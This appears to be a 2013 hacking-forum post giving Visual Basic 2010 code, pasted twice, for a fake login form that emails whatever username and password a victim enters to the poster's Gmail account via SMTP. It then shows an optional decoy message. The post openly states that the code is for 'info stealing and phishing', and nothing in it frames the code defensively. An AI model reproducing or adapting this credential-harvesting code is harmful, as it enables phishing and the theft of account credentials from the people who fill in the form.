Visual Basic 2010 email sender 08-18-2013, 10:07 AM
#1
you can use this for info stealing and phishing
you need:
2 textboxes
1 button
put this to the very top:
imports system.net.mail
button1 code:
Dim smtp as new SmtpClient()
dim mail as new mailmessage()
mail.to.add("youremailhere@gmail.com")
mail.from = new mailaddress("youremail@gmail.com")
mail.subject = "account info"
mail.body = "username: " & textbox1.text & " password: " & textbox2.text
smtp.credentials = new net.networkcredential("youremail@gmail.com", "your gmail password here")
smtp.enablessl = true
smtp.port = 587
smtp.Host = "smtp.gmail.com"
smtp.Send(mail)
msgbox("optional error/message")
you need:
2 textboxes
1 button
put this to the very top:
imports system.net.mail
button1 code:
Dim smtp as new SmtpClient()
dim mail as new mailmessage()
mail.to.add("youremailhere@gmail.com")
mail.from = new mailaddress("youremail@gmail.com")
mail.subject = "account info"
mail.body = "username: " & textbox1.text & " password: " & textbox2.text
smtp.credentials = new net.networkcredential("youremail@gmail.com", "your gmail password here")
smtp.enablessl = true
smtp.port = 587
smtp.Host = "smtp.gmail.com"
smtp.Send(mail)
msgbox("optional error/message")